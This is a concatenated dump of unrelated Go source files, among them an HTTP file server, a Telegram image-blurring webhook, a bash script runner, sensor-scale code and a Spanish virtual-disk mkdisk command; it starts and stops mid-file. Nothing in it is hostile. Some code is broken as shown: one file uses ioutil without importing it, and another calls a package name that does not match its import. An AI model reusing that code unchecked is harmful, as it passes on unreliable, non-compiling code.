	assert.Equal(t, rune(1), num)
	num = stack.Pop()
	assert.Equal(t, rune(0), num)
}
|
// A simple HTTP server.
//
// REF [Go HTTP server-side programming](http://cizixs.com/2016/08/17/golang-http-server-side)
package main
import (
"net/http"
"os"
)
// Approach 1:
// handler implements the http.Handler interface.
type handler struct{}

// ServeHTTP writes a fixed greeting; the write error is ignored here.
func (h *handler) ServeHTTP(res http.ResponseWriter, req *http.Request) {
	res.Write([]byte("Hello, world!"))
}
// Approach 2: a plain function with the http.HandlerFunc signature that
// writes a fixed greeting.
func handlerFunc(res http.ResponseWriter, req *http.Request) {
	_, _ = res.Write([]byte("Hello, world!"))
}
// main demonstrates the registration styles, then serves the working
// directory as a static file server on :12345.
func main() {
	addr := ":12345"
	// Approach 1: register via http.Handle
	//http.Handle("/", &handler{})
	// Approach 2: register via http.HandleFunc
	http.HandleFunc("/", handlerFunc)
	//http.ListenAndServe(addr, nil)
	// Some built-in handlers:
	root := "."
	if wd, err := os.Getwd(); err == nil {
		root = wd
	}
	// Static file server
	http.ListenAndServe(addr, http.FileServer(http.Dir(root)))
	// not found(404) handler
	// http.NotFoundHandler()
	// redirect handler
	// http.RedirectHandler("/", 300)
}
|
package api
import (
"bytes"
"encoding/json"
"image"
"image/jpeg"
"io"
"io/ioutil"
"log"
"net/http"
"os"
"github.com/BurntSushi/graphics-go/graphics"
tgbotapi "github.com/go-telegram-bot-api/telegram-bot-api"
)
// gracefulExit logs the reason but still answers 200/"OK", so the
// webhook caller treats the delivery as handled.
func gracefulExit(w http.ResponseWriter, text string) {
	log.Println(text)
	w.WriteHeader(http.StatusOK)
	_, _ = w.Write([]byte("OK"))
}
// Handler telegram hook: receives an Update, downloads the attached
// document, blurs it and sends the result back to the chat. All failure
// paths answer 200 via gracefulExit so Telegram does not retry.
func Handler(w http.ResponseWriter, r *http.Request) {
	token, ok := os.LookupEnv("BOT_TOKEN")
	if !ok {
		gracefulExit(w, "no telegram bot token")
		return
	}
	bot, err := tgbotapi.NewBotAPI(token)
	if err != nil {
		// Previously this error was silently overwritten by the next
		// assignment, so a bad token only surfaced later as a crash.
		gracefulExit(w, "telegram bot init error")
		return
	}
	body, err := ioutil.ReadAll(r.Body)
	if err != nil {
		gracefulExit(w, "no body")
		return
	}
	var update tgbotapi.Update
	if err := json.Unmarshal(body, &update); err != nil {
		gracefulExit(w, "body parse error")
		return
	}
	message := update.Message
	if message.Document == nil {
		gracefulExit(w, "no file")
		return
	}
	url, err := bot.GetFileDirectURL(message.Document.FileID)
	if err != nil {
		gracefulExit(w, "file error")
		return
	}
	client := http.Client{}
	res, err := client.Get(url)
	if err != nil {
		gracefulExit(w, "file load error")
		return
	}
	defer res.Body.Close()
	buf := new(bytes.Buffer)
	err = blur(res.Body, buf)
	if err != nil {
		gracefulExit(w, "cannot blur this file")
		return
	}
	// NOTE(review): the payload is JPEG-encoded by blur but named
	// "blured.png" — confirm the intended extension.
	msg := tgbotapi.NewDocumentUpload(int64(message.Chat.ID), tgbotapi.FileBytes{
		Name:  "blured.png",
		Bytes: buf.Bytes(),
	})
	// todo: looks like send message can be done via response on this webhook request
	// but let's use this API for now
	bot.Send(msg)
	w.WriteHeader(http.StatusOK)
	w.Write([]byte("OK"))
}
// blur decodes an image from file, applies a gaussian blur and writes
// the result to w as JPEG at the default quality.
func blur(file io.Reader, w io.Writer) error {
	srcImage, _, err := image.Decode(file)
	if err != nil {
		return err
	}
	dstImage := image.NewRGBA(srcImage.Bounds())
	graphics.Blur(dstImage, srcImage, &graphics.BlurOptions{StdDev: 5.5})
	// Propagate the encode error (the original dropped it) and name the
	// composite-literal field explicitly.
	return jpeg.Encode(w, dstImage, &jpeg.Options{Quality: jpeg.DefaultQuality})
}
|
package main
import (
"fmt"
"log"
"os"
"os/exec"
"bytes"
)
// es writes the given lines to a temporary script, executes it with
// /bin/bash, deletes the script, and returns stderr output when there
// was any, otherwise stdout. Fatal errors terminate the process.
func es(content []string) string {
	// Write File. The original used `string(30)` as the file name, which
	// is the single control character "\x1e" — use a real temp file.
	f, err := ioutil.TempFile("", "es-script")
	if err != nil {
		log.Fatalf("%s\n", err)
	}
	cmdLines := f.Name()
	for _, v := range content {
		// The original never checked the write error (it re-tested a
		// stale err); check it per line.
		if _, err := fmt.Fprintln(f, v); err != nil {
			f.Close()
			log.Fatalf("%s\n", err)
		}
	}
	if err := f.Close(); err != nil {
		log.Fatalf("%s\n", err)
	}
	// Execute File
	cmd := exec.Command("/bin/bash", cmdLines)
	var stdout, stderr bytes.Buffer
	cmd.Stdout = &stdout //os.Stdout
	cmd.Stderr = &stderr //os.Stderr
	if err := cmd.Run(); err != nil {
		log.Fatalf("%s\n", err)
	}
	// Delete File
	if err := os.Remove(cmdLines); err != nil {
		log.Fatalf("%s\n", err)
	}
	// Return Data: stderr wins when non-empty, even on a zero exit.
	if errStr := stderr.String(); errStr != "" {
		return errStr
	}
	return stdout.String()
}
|
package run
import (
"testing"
floc "gopkg.in/workanator/go-floc.v1"
)
// numOfRacers is the number of competing jobs started in every race test.
const numOfRacers = 10

// TestRaceLimit runs the race with every legal limit from 1 to numOfRacers.
func TestRaceLimit(t *testing.T) {
	for no := 1; no <= numOfRacers; no++ {
		runRaceTest(t, no)
	}
}
// TestRaceLimitPanic verifies RaceLimit panics for out-of-range limits
// (zero and greater than the number of racers).
func TestRaceLimitPanic(t *testing.T) {
	mustPanic := func(limit int) {
		defer func() {
			if recover() == nil {
				t.Fatalf("%s must panic because of invalid limit", t.Name())
			}
		}()
		runRaceTest(t, limit)
	}

	// Panic on zero limit
	mustPanic(0)
	// Panic on big limit
	mustPanic(numOfRacers + 1)
}
// runRaceTest races numOfRacers increment jobs under the given
// concurrency limit and checks that exactly `limit` of them won.
func runRaceTest(t *testing.T, limit int) {
	// Construct the flow control object.
	flow := floc.NewFlow()
	defer flow.Release()
	// Construct the state object which as data contains the counter.
	state := floc.NewState(new(int))
	defer state.Release()
	// Construct the racing jobs (typo "Counstruct" fixed).
	racers := make([]floc.Job, numOfRacers)
	for i := 0; i < numOfRacers; i++ {
		racers[i] = jobIncrement
	}
	job := RaceLimit(limit, racers...)
	// Run the job.
	floc.Run(flow, state, updateCounter, job)
	v := getCounter(state)
	if v != limit {
		t.Fatalf("%s expects counter value to be %d but get %d", t.Name(), limit, v)
	}
}
|
package secl
import (
"encoding/xml"
"github.com/thought-machine/finance-messaging/iso20022"
)
// Document00400103 is the XML document wrapper for the secl.004.001.03
// (Net Position) ISO 20022 message.
type Document00400103 struct {
	XMLName xml.Name        `xml:"urn:iso:std:iso:20022:tech:xsd:secl.004.001.03 Document"`
	Message *NetPositionV03 `xml:"NetPos"`
}
// AddMessage allocates a fresh NetPositionV03 payload, attaches it to the document and returns it.
func (d *Document00400103) AddMessage() *NetPositionV03 {
	d.Message = new(NetPositionV03)
	return d.Message
}
// Scope
// The Net Position Report message is sent by the central counterparty (CCP) to a clearing member to confirm the net position of all trade legs reported during the day.
//
// The message definition is intended for use with the ISO 20022 Business Application Header.
//
// Usage
// The central counterparty (CCP) nets all the positions per clearing account and sends the Net Position report message to the Clearing member.
type NetPositionV03 struct {
	// Provides parameters of the margin report such as the creation date and time, the report currency or the calculation date and time.
	ReportParameters *iso20022.ReportParameters1 `xml:"RptParams"`
	// Provides information about the number of used pages.
	Pagination *iso20022.Pagination `xml:"Pgntn"`
	// Provides the identification of the account owner, that is the clearing member (individual clearing member or general clearing member).
	ClearingMember *iso20022.PartyIdentification35Choice `xml:"ClrMmb"`
	// Clearing organisation that will clear the trade.
	//
	// Note: This field allows Clearing Member Firm to segregate flows coming from clearing counterparty's clearing system. Indeed, Clearing Member Firms receive messages from the same system (same sender) and this field allows them to know if the message is related to equities or derivatives.
	ClearingSegment *iso20022.PartyIdentification35Choice `xml:"ClrSgmt,omitempty"`
	// Provides the net position details such as the average deal price and net quantity.
	NetPositionReport []*iso20022.NetPosition3 `xml:"NetPosRpt"`
	// Additional information that can not be captured in the structured fields and/or any other specific block.
	SupplementaryData []*iso20022.SupplementaryData1 `xml:"SplmtryData,omitempty"`
}
// AddReportParameters allocates, attaches and returns the report parameters block.
func (n *NetPositionV03) AddReportParameters() *iso20022.ReportParameters1 {
	n.ReportParameters = new(iso20022.ReportParameters1)
	return n.ReportParameters
}
// AddPagination allocates, attaches and returns the pagination block.
func (n *NetPositionV03) AddPagination() *iso20022.Pagination {
	n.Pagination = new(iso20022.Pagination)
	return n.Pagination
}
// AddClearingMember allocates, attaches and returns the clearing member identification.
func (n *NetPositionV03) AddClearingMember() *iso20022.PartyIdentification35Choice {
	n.ClearingMember = new(iso20022.PartyIdentification35Choice)
	return n.ClearingMember
}
// AddClearingSegment allocates, attaches and returns the clearing segment identification.
func (n *NetPositionV03) AddClearingSegment() *iso20022.PartyIdentification35Choice {
	n.ClearingSegment = new(iso20022.PartyIdentification35Choice)
	return n.ClearingSegment
}
// AddNetPositionReport appends a new net position entry and returns it.
func (n *NetPositionV03) AddNetPositionReport() *iso20022.NetPosition3 {
	newValue := new(iso20022.NetPosition3)
	n.NetPositionReport = append(n.NetPositionReport, newValue)
	return newValue
}
// AddSupplementaryData appends a new supplementary data entry and returns it.
func (n *NetPositionV03) AddSupplementaryData() *iso20022.SupplementaryData1 {
	newValue := new(iso20022.SupplementaryData1)
	n.SupplementaryData = append(n.SupplementaryData, newValue)
	return newValue
}
|
package main
// Constructor example.
import "fmt"
// person models a person with a name, gender and age.
type person struct {
	name   string
	gender string
	age    int
}
// Constructor: by convention the name starts with "new".
// Whether to return a value or a pointer depends on the struct: with few
// fields a value is fine; with many fields return a pointer to reduce
// copying overhead.
// func newPerson(name string, gender string, age int) person { // value version
// 	return person{
// 		name: name,
// 		gender: gender,
// 		age: age,
// 	}
// }

// newPerson builds a *person from the given attributes.
func newPerson(name string, gender string, age int) *person { // pointer version
	return &person{
		name:   name,
		gender: gender,
		age:    age,
	}
}
// main demonstrates the constructor and prints the result in Go syntax (%#v).
func main() {
	s1 := newPerson("xiaohong", "male", 8)
	fmt.Printf("%#v\n", s1)
}
|
package ascii2svg // import "moul.io/ascii2svg/ascii2svg"
|
/*
Write a function redundant that takes in a string str and returns
a function that returns str.
Notes
Your function should return a function, not a string.
*/
package main
import "fmt"
// main demonstrates redundant with three sample strings, including the
// empty string.
func main() {
	for _, word := range []string{"apple", "pear", ""} {
		get := redundant(word)
		fmt.Println(get())
	}
}
// redundant returns a closure that always yields s.
func redundant(s string) func() string {
	get := func() string {
		return s
	}
	return get
}
|
package byscaler
import (
"bylib/bylog"
"bylib/byutils"
"sync"
)
const (
	// MAX_STILL_COUNT is the number of consecutive stable readings a
	// sensor must report. NOTE(review): not referenced in the visible
	// code (Compare takes `still` as a parameter) — confirm usage.
	MAX_STILL_COUNT = 3
)
// SensorSet is a set of sensors / one scale; typically one scale is
// connected to n sensors.
type SensorSet struct {
	Addr      int32           `json:"addr"` // concentrator ID
	Online    bool            `json:"-"`
	TimeStamp int64           `json:"-"`     // timestamp of the last update
	Timeout   int32           `json:"-"`     // timeout counter
	Diffs     map[int]int32   `json:"diffs"` // per-sensor difference thresholds (original comment said "zero points" — likely copy-paste)
	Zeros     map[int]int32   `json:"zeros"` // per-sensor zero points
	Sensors   map[int]*Sensor // sensor address -> sensor info
	Lock      sync.Mutex      `json:"-"`
}
// SensorNum returns how many sensors belong to this set.
func (ss *SensorSet) SensorNum() int {
	return len(ss.Sensors)
}
// Zero returns the recorded zero point for the sensor address, or 0 when none is recorded.
func (ss *SensorSet) Zero(addr int) int32 {
	if z, ok := ss.Zeros[addr]; ok {
		return z
	}
	return 0
}
// SetDiff stores the difference threshold for one sensor address.
// NOTE(review): unlike SetValue/SetAllZero this does not take ss.Lock —
// confirm callers serialize access.
func (ss *SensorSet) SetDiff(addr int, value int32) {
	ss.Diffs[addr] = value
}
// SetZero stores the zero point for one sensor address.
// NOTE(review): not guarded by ss.Lock — confirm callers serialize access.
func (ss *SensorSet) SetZero(addr int, value int32) {
	ss.Zeros[addr] = value
}
// SetValue sets the calculated value of one sensor under the set lock.
// NOTE(review): panics if addr is not present in ss.Sensors.
func (ss *SensorSet) SetValue(addr int, value int32) {
	ss.Lock.Lock()
	defer ss.Lock.Unlock()
	ss.Sensors[addr].CalcValue = value
}
// SetAllZero sets every sensor's calculated value to the given value under the set lock.
func (ss *SensorSet) SetAllZero(value int32) {
	ss.Lock.Lock()
	defer ss.Lock.Unlock()
	for _, s := range ss.Sensors {
		s.CalcValue = value
	}
}
// UpdateDiff applies the same difference threshold to every known sensor address.
func (ss *SensorSet) UpdateDiff(value int32) {
	ss.Lock.Lock()
	defer ss.Lock.Unlock()
	for addr, _ := range ss.Sensors {
		ss.Diffs[addr] = value
	}
}
// Clear tares the scale: records each sensor's current raw value as its
// zero point.
func (ss *SensorSet) Clear() {
	ss.Lock.Lock()
	defer ss.Lock.Unlock()
	for addr, s := range ss.Sensors {
		ss.Zeros[addr] = s.Value
	}
}
// GetErrSensor returns copies of all sensors whose state reports an error.
// NOTE(review): unlike the other accessors this does not take ss.Lock.
func (ss *SensorSet) GetErrSensor() (sensors []*Sensor) {
	for _, s := range ss.Sensors {
		if s.State.Error {
			sensors = append(sensors, &Sensor{
				Addr:       s.Addr,
				Value:      s.Value,
				CalcValue:  s.CalcValue,
				StateValue: s.StateValue,
				State:      s.State,
			})
		}
	}
	return
}
// Update recomputes each sensor's calculated value as raw value minus
// its zero point (when one is recorded), under the set lock.
func (ss *SensorSet) Update() {
	ss.Lock.Lock()
	defer ss.Lock.Unlock()
	for _, s := range ss.Sensors {
		s.CalcValue = s.Value
		if z, ok := ss.Zeros[int(s.Addr)]; ok {
			s.CalcValue = s.Value - z
		}
	}
}
// GetValues returns the raw values of the sensors addressed 1..SensorNum().
// Sensor addresses start at 1.
// NOTE(review): panics if any address in that range is missing from
// ss.Sensors — confirm addresses are always contiguous. Not lock-guarded.
func (ss *SensorSet) GetValues() []uint16 {
	sn := ss.SensorNum()
	var values []uint16
	for i := 1; i <= sn; i++ {
		values = append(values, uint16(ss.Sensors[i].Value))
	}
	return values
}
// CopySensorSet copies the calculated values of sset2's sensors into the
// matching sensors of this set (only this set's lock is held).
func (sset *SensorSet) CopySensorSet(sset2 *SensorSet) {
	sset.Lock.Lock()
	defer sset.Lock.Unlock()
	for addr, s := range sset2.Sensors {
		if s == nil {
			bylog.Debug("s==nil")
			continue
		}
		if _, ok := sset.Sensors[addr]; ok {
			bylog.Debug("copy id=%d addr=%d value=%d", sset.Addr, addr, s.CalcValue)
			sset.Sensors[addr].CalcValue = s.CalcValue
		}
	}
}
// CopySensors returns a snapshot copy of all sensors, taken under the set lock.
func (sset *SensorSet) CopySensors() (sr []*Sensor) {
	sset.Lock.Lock()
	defer sset.Lock.Unlock()
	for _, s := range sset.Sensors {
		sr = append(sr, &Sensor{
			Addr:       s.Addr,
			Value:      s.Value,
			CalcValue:  s.CalcValue,
			StateValue: s.StateValue,
			State:      s.State,
		})
		//if addr == 1{
		//	bylog.Debug("calc=%d",s.CalcValue)
		//}
	}
	return
}
// Compare compares the current sensor values against the snapshot in old
// and returns the sensors whose calculated value changed by more than
// the allowed difference. diff is the global fallback threshold (a
// per-sensor threshold in sset.Diffs takes precedence); still is the
// number of consecutive stable readings required before a sensor is
// considered. Sensors seen for the first time are recorded into old
// without being reported.
func (sset *SensorSet) Compare(old *SensorSet, diff int32, still uint8) (sg []*Sensor) {
	sset.Lock.Lock()
	defer sset.Lock.Unlock()
	// Walk the current readings directly.
	for addr, s := range sset.Sensors {
		// Debug leftovers kept from the original:
		//if sset.Addr==1 && addr==2{
		//	bylog.Debug("w=%d state=%x still=%d",s.Value,s.StateValue,s.StillCount)
		//}
		//if !s.State.Still || s.State.Error {
		if _, ok := sset.Diffs[addr]; !ok {
			// No per-sensor threshold yet: seed it with the global one.
			sset.Diffs[addr] = int32(diff)
		}
		if s.State.Error {
			// Faulty reading: reset the stability counter and skip.
			s.StillCount = 0
			continue
		}
		// Require `still` consecutive stable readings before comparing.
		if s.StillCount < still {
			s.StillCount++
			continue
		}
		s.StillCount = 0
		// First sighting of this address: record it into old, report nothing.
		if _, ok := old.Sensors[addr]; !ok {
			old.Sensors[addr] = NewSensor(int32(addr))
			old.Sensors[addr].Value = s.Value
			old.Sensors[addr].CalcValue = s.CalcValue
			old.Sensors[addr].Addr = s.Addr
			old.Sensors[addr].State = s.State
			old.Sensors[addr].TimeStamp = s.TimeStamp
			old.Sensors[addr].Timeout = s.Timeout
			old.Sensors[addr].StateValue = s.StateValue
			continue
		}
		df := byutil.Abs(int(s.CalcValue), int(old.Sensors[addr].CalcValue))
		//bylog.Debug("addr=%d new=%d old=%d diff=%d %d",addr,s.CalcValue,old.Sensors[addr].CalcValue,df,diff)
		if sdiff, ok := sset.Diffs[addr]; ok {
			// Prefer the sensor's own threshold when present.
			diff = sdiff
		} else {
			// Otherwise seed it with the default.
			sset.Diffs[addr] = int32(diff)
		}
		if df > int(diff) {
			if addr == 2 {
				bylog.Debug("df=%d diff=%d", df, diff)
			}
			// Report the delta relative to the previous reference value.
			sg = append(sg, &Sensor{
				Addr:       int32(addr),
				CalcValue:  s.CalcValue - old.Sensors[addr].CalcValue,
				State:      s.State,
				StateValue: s.StateValue,
				TimeStamp:  s.TimeStamp,
				Timeout:    s.Timeout,
			})
			// Only refresh the stored reference once the threshold is exceeded.
			old.Sensors[addr].Value = s.Value
			old.Sensors[addr].CalcValue = s.CalcValue
			old.Sensors[addr].Addr = s.Addr
			old.Sensors[addr].State = s.State
			old.Sensors[addr].StateValue = s.StateValue
			old.Sensors[addr].TimeStamp = s.TimeStamp
			old.Sensors[addr].Timeout = s.Timeout
		} else {
			// Below the threshold: keep the previous reference value.
		}
	}
	return
}
func NewSensorSet(addr int32 )*SensorSet {
ss:=&SensorSet{
Addr:addr,
Sensors:make(map[int]*Sensor),
Zeros:make(map[int]int32),
Diffs:make(map[int]int32),
}
return ss
} |
package treenode
var (
	// ExampleTree1: root 1 with children 3 (which has children 5, 6), 2 and 4.
	ExampleTree1 = &Node{
		Val: 1,
		Children: []*Node{
			{
				Val: 3,
				Children: []*Node{
					{Val: 5},
					{Val: 6},
				},
			},
			{Val: 2},
			{Val: 4},
		},
	}
	// ExampleTree2: a deeper tree — 1 -> {2, 3, 4, 5}, with the longest
	// branch 3 -> 7 -> 11 -> 14.
	ExampleTree2 = &Node{
		Val: 1,
		Children: []*Node{
			{Val: 2},
			{
				Val: 3,
				Children: []*Node{
					{Val: 6},
					{Val: 7, Children: []*Node{
						{Val: 11, Children: []*Node{
							{Val: 14},
						}},
					}},
				},
			},
			{Val: 4, Children: []*Node{
				{Val: 8, Children: []*Node{
					{Val: 12},
				}},
			}},
			{Val: 5, Children: []*Node{
				{Val: 9, Children: []*Node{
					{Val: 13},
				}},
				{Val: 10},
			}},
		},
	}
)
package info
import (
"bytes"
"testing"
"github.com/trevershick/analytics2-cli/a2m/test"
"github.com/trevershick/analytics2-cli/a2m/config"
)
// Test_showHalted feeds a canned REST response through showHalted and
// checks both the requested URL and the rendered output fields.
func Test_showHalted(t *testing.T) {
	cfg := config.Configuration{}
	cfg.BaseUrl = "http://localhost:1000/xxx"
	response := `
[{"workspaceOid":41529001,"subscriptionId":100,"data":{"reason":"manually halted"},"healthCheckShouldFail":false,"timestamp":"2015-02-14T15:32:28Z"}]
`
	myLoader, passedInRestArgs := test.FakeRestLoader(response)
	var myWriter bytes.Buffer
	args := &showHaltedArgs{
		config: &cfg,
		loader: myLoader,
		writer: &myWriter,
	}
	showHalted(args)
	test.AssertEquals(t, "http://localhost:1000/xxx/info/haltedWorkspaces", passedInRestArgs.Url)
	output := myWriter.String()
	test.AssertContains(t, "Halted Workspaces", output)
	test.AssertContains(t, "41529001", output)
	test.AssertContains(t, "100", output)
	test.AssertContains(t, "manually halted", output)
	test.AssertContains(t, "false", output)
	test.AssertContains(t, "2015-02-14T15:32:28Z", output)
}
|
//-----------------------------------------------Paquetes E Imports-----------------------------------------------------
package AnalisisYComandos
import (
"../Metodos"
"../Variables"
"bytes"
"encoding/binary"
"fmt"
"github.com/gookit/color"
"math/rand"
"os"
"strconv"
"strings"
"time"
"unsafe"
)
//--------------------------------------------------------Métodos-------------------------------------------------------
// VerificarComandoMkdisk validates the parameters of the mkdisk command
// (size, path, name, unit). Each parameter may appear at most once;
// size/path/name are mandatory and unit is optional (defaulting to
// megabytes). Every violation prints a Spanish error message; only when
// everything is valid does it continue with ObtenerRutaArchivo. If a
// directory was created during path validation but validation failed,
// the directory is removed again.
func VerificarComandoMkdisk() {
	// Flags recording whether each parameter was seen and valid.
	var Size bool
	var Path bool
	var Name bool
	var Unit bool
	var ParametroExtra bool
	var ArregloParametros []string
	// Occurrence counters to reject duplicated parameters.
	var ContadorSize int
	var ContadorPath int
	var ContadorName int
	var ContadorUnit int
	var AvisoError error
	// Initial assignment; unit is valid by default (it is optional).
	Size = false
	Path = false
	Name = false
	Unit = true
	ParametroExtra = false
	ContadorSize = 0
	ContadorPath = 0
	ContadorName = 0
	ContadorUnit = 0
	Variables.MapComandos = make(map[string]string)
	// Default unit: megabytes (1048576 bytes).
	Variables.MapComandos["unit"] = "1048576"
	Variables.CreeDirectorio = false
	// Parameter verification
	if len(Variables.ArregloComandos) > 1 {
		for Contador := 1; Contador <= len(Variables.ArregloComandos)-1; Contador++ {
			// Fetch the parameter and normalize its name.
			Variables.ArregloComandos[Contador] = Metodos.Trim(Variables.ArregloComandos[Contador])
			ArregloParametros = Metodos.SplitParametro(Variables.ArregloComandos[Contador])
			ArregloParametros[0] = strings.ToLower(ArregloParametros[0])
			ArregloParametros[0] = Metodos.Trim(ArregloParametros[0])
			switch ArregloParametros[0] {
			case "size":
				if ContadorSize == 0 {
					if len(ArregloParametros) > 1 {
						ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
						var Tamanio int
						var ErrorEntero error
						// size must be an integer greater than zero.
						Tamanio, ErrorEntero = strconv.Atoi(ArregloParametros[1])
						if ErrorEntero != nil {
							color.HEX("#de4843", false).Println("El Parametro Size Debe Ser Un Número")
							fmt.Println("")
						} else {
							if Tamanio > 0 {
								Variables.MapComandos["size"] = ArregloParametros[1]
								Size = true
							} else {
								Size = false
								color.HEX("#de4843", false).Println("El Parametro Size Debe Ser Un Número Mayor A 0")
								fmt.Println("")
							}
							ContadorSize++
						}
					} else {
						Size = false
					}
				} else {
					ContadorSize++
				}
			case "path":
				if ContadorPath == 0 {
					if len(ArregloParametros) > 1 {
						ArregloParametros[1] = Metodos.QuitarComillas(ArregloParametros[1])
						ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
						// Validates the route and creates missing directories.
						Path = Metodos.VerificarYCrearRutas(ArregloParametros[1])
						if Path {
							Variables.MapComandos["path"] = ArregloParametros[1]
						}
						ContadorPath++
					} else {
						Path = false
					}
				} else {
					ContadorPath++
				}
			case "name":
				if ContadorName == 0 {
					if len(ArregloParametros) > 1 {
						ArregloParametros[1] = Metodos.QuitarComillas(ArregloParametros[1])
						ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
						// The name must avoid forbidden characters and end in .dsk.
						Name = Metodos.ContineCaractereProhibidos(ArregloParametros[1])
						if Name {
							Name = Metodos.VerificarExtension(ArregloParametros[1])
							if Name {
								Variables.MapComandos["name"] = ArregloParametros[1]
							} else {
								color.HEX("#de4843", false).Println("En El Parametro Name La Extension Del Archivo No Es la Indicada Debe De Ser .dsk")
								fmt.Println("")
							}
						} else {
							color.HEX("#de4843", false).Println("En El Parametor Name El Nombre Del Disco Contiene Carcteres Prohibidos")
							fmt.Println("")
						}
						ContadorName++
					} else {
						Name = false
					}
				} else {
					ContadorName++
				}
			case "unit":
				if ContadorUnit == 0 {
					if len(ArregloParametros) > 1 {
						ArregloParametros[1] = strings.ToLower(Metodos.Trim(ArregloParametros[1]))
						// k = kilobytes (1024), m = megabytes (1048576).
						if ArregloParametros[1] == "k" {
							Variables.MapComandos["unit"] = "1024"
							Unit = true
						} else if ArregloParametros[1] == "m" {
							Variables.MapComandos["unit"] = "1048576"
							Unit = true
						} else {
							color.HEX("#de4843", false).Println("En El Parametro Unit Debe De Ingresar La Letra m (Megabytes) O La Letra k (Kylobytes)")
							fmt.Println("")
							Unit = false
						}
						ContadorUnit++
					} else {
						Unit = false
					}
				} else {
					ContadorUnit++
				}
			default:
				// Anything else is an unknown parameter.
				ParametroExtra = true
			}
		}
	}
	if Path && Size && Name && Unit && !ParametroExtra && ContadorPath == 1 && ContadorSize == 1 && ContadorName == 1 && (ContadorUnit == 1 || ContadorUnit == 0) {
		ObtenerRutaArchivo()
	} else {
		// Report every validation failure that applies.
		if ParametroExtra {
			color.HEX("#de4843", false).Println("Parametro Especificado No Valido")
			color.HEX("#de4843", false).Println("Parametros Validos: ")
			color.HEX("#de4843", false).Println("1). -path-> (Obligatorio)")
			color.HEX("#de4843", false).Println("2). -size-> (Obligatorio)")
			color.HEX("#de4843", false).Println("3). -name-> (Obligatorio)")
			color.HEX("#de4843", false).Println("4). -unit-> (Opcional)")
			fmt.Println("")
		}
		if !Path {
			color.HEX("#de4843", false).Println("No Se Encuentra El Parametro -path-> o")
			color.HEX("#de4843", false).Println("Error Al Crear El Directorio")
			fmt.Println("")
		}
		if !Size {
			color.HEX("#de4843", false).Println("No Se Encuentra El Parametro -size-> o")
			color.HEX("#de4843", false).Println("Existe Error En La Sintaxis")
			fmt.Println("")
		}
		if !Name {
			color.HEX("#de4843", false).Println("No Se Encuentra el Parametro -name-> o")
			color.HEX("#de4843", false).Println("Existe Error En La Sintaxis")
			fmt.Println("")
		}
		if !Unit {
			color.HEX("#de4843", false).Println("Existe Error En La Sintaxis En El Paremtro -unit->")
			fmt.Println("")
		}
		if ContadorSize > 1 || ContadorPath > 1 || ContadorName > 1 || ContadorUnit > 1 {
			color.HEX("#de4843", false).Println("Existen Demasiados Parametros")
			fmt.Println("")
		}
		// Roll back any directory created while validating the path.
		if Variables.CreeDirectorio {
			AvisoError = os.Remove(Metodos.Trim(Variables.MapComandos["path"]))
			_ = AvisoError
		}
	}
}
// ObtenerRutaArchivo builds the full disk-file path from the "path" and
// "name" command parameters and hands it to VerificarSiExisteDisco.
// The OS-specific path separator is appended only when the configured
// path does not already end with one. Unsupported operating systems
// print an error and abort.
func ObtenerRutaArchivo() {
	// Select the path separator for the detected operating system.
	var Separador string
	switch Variables.SistemaOperativo {
	case "windows":
		Separador = "\\"
	case "linux":
		Separador = "/"
	default:
		color.HEX("#de4843", false).Println("Sistema Operativo No Soportado")
		fmt.Println("")
		return
	}
	Ruta := Metodos.Trim(Variables.MapComandos["path"])
	Nombre := Metodos.Trim(Variables.MapComandos["name"])
	// Avoid a doubled separator when the path already ends with one.
	if !strings.HasSuffix(Ruta, Separador) {
		Ruta += Separador
	}
	VerificarSiExisteDisco(Ruta + Nombre)
}
// VerificarSiExisteDisco checks whether a disk file already exists at
// RutaArchivo. If it does, an error is reported to the user; otherwise
// the disk is created via ComandoMkdisk.
func VerificarSiExisteDisco(RutaArchivo string) {
	// Metodos.ExisteArchivo reports whether the file is already present.
	if Metodos.ExisteArchivo(Metodos.Trim(RutaArchivo)) {
		color.HEX("#de4843", false).Println("Ya Existe Un Disco Con El Mismo Nombre En La Ruta Indicada")
		fmt.Println("")
		return
	}
	ComandoMkdisk(RutaArchivo)
}
// ComandoMkdisk creates the virtual disk file at RutaArchivo and
// initializes it with a Master Boot Record (MBR).
//
// The total file size is unit*size bytes, taken from the parsed command
// parameters MapComandos["unit"] and MapComandos["size"]. The file is
// grown to that size by writing a single zero byte at offset 0 and
// another at the last offset, then an MBR structure is serialized
// (big-endian) back at offset 0.
func ComandoMkdisk(RutaArchivo string) {
	// Variables
	var Archivo *os.File
	var AvisoError error
	var CeroBinario int8
	var CeroByte *int8
	var CadenaBinaria bytes.Buffer
	var CadenaBinariaFinal bytes.Buffer
	var CadenaBinariaMBR bytes.Buffer
	var Posicion int64
	var Unit int
	var Size int
	var Fecha time.Time
	var MBRAuxiliar = Variables.MBREstructura{}
	// Create the disk file.
	Archivo, AvisoError = os.Create(RutaArchivo)
	// Catch error
	if AvisoError != nil {
		color.HEX("#de4843", false).Println("Error al Generar Al Archivo")
		fmt.Println("")
	} else {
		// Zero byte used to pad both ends of the file.
		CeroBinario = 0
		CeroByte = &CeroBinario
		// Write a zero byte at the beginning of the file.
		// NOTE(review): binary.Write and Seek errors are ignored here and
		// below — confirm this best-effort behavior is intentional.
		_ = binary.Write(&CadenaBinaria, binary.BigEndian, CeroByte)
		Metodos.EscribirArchivoBinario(Archivo, CadenaBinaria.Bytes())
		// Compute the final byte offset: unit*size - 1.
		// NOTE(review): Atoi errors are ignored; a missing or invalid
		// "unit"/"size" parameter yields 0 — presumably the command parser
		// always populates these before reaching here. Verify.
		Unit, _ = strconv.Atoi(Metodos.Trim(Variables.MapComandos["unit"]))
		Size, _ = strconv.Atoi(Metodos.Trim(Variables.MapComandos["size"]))
		Posicion = int64((Unit * Size) - 1)
		// Seek to the final offset of the file.
		_, _ = Archivo.Seek(Posicion, 0)
		// Write a zero byte at the end so the file occupies the full size.
		_ = binary.Write(&CadenaBinariaFinal, binary.BigEndian, CeroByte)
		Metodos.EscribirArchivoBinario(Archivo, CadenaBinariaFinal.Bytes())
		// Write the MBR.
		// Seek back to the start of the file to place the MBR there.
		_, _ = Archivo.Seek(0, 0)
		// Fill in the MBR structure.
		MBRAuxiliar = Variables.MBREstructura{}
		// Usable disk size = total size - size of the MBR itself.
		MBRAuxiliar.SizeMbr = Posicion + 1 - int64(unsafe.Sizeof(Variables.MBREstructura{}))
		// Creation timestamp.
		Fecha = time.Now()
